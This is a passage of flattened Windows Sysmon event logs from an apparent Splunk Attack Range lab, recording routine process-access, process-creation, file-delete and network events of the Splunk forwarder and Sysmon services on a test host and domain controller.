Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.942{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A83-6151-BC79-00000000FD01}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.943{69CF5F33-8A83-6151-BC79-00000000FD01}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10AB25CCF544EACB55074EE3F412FD14,SHA256=83FEADDBD864149850A5A543D4CE29602CEABA424B1F0E012C2E1FB0A2495E91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:27.613{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44BB2C4FDC30B9847011A622027618DA,SHA256=2076BF310EEC572253B5004E72078E93350F41ACB1FB887DD865F2250AC470BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.270{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A83-6151-BB79-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.270{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.270{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8A83-6151-BB79-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A83-6151-BB79-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:27.255{69CF5F33-8A83-6151-BB79-00000000FD01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:25.253{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63916-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.833{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A12AF1AA0E92EA8611CEE72E66B1944D,SHA256=9C18C1AB30468C3343AFE71457AEAD8A70BEE9A3E2181139078FE1154279A6FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:28.635{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36836818A90B5DE1DA8EF50EFDE21C2C,SHA256=EC37C1C987D88E971ECA46D2122D783166B4907BBBF1C9771D78844281D9DEE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A84-6151-BD79-00000000FD01}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:28.489{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 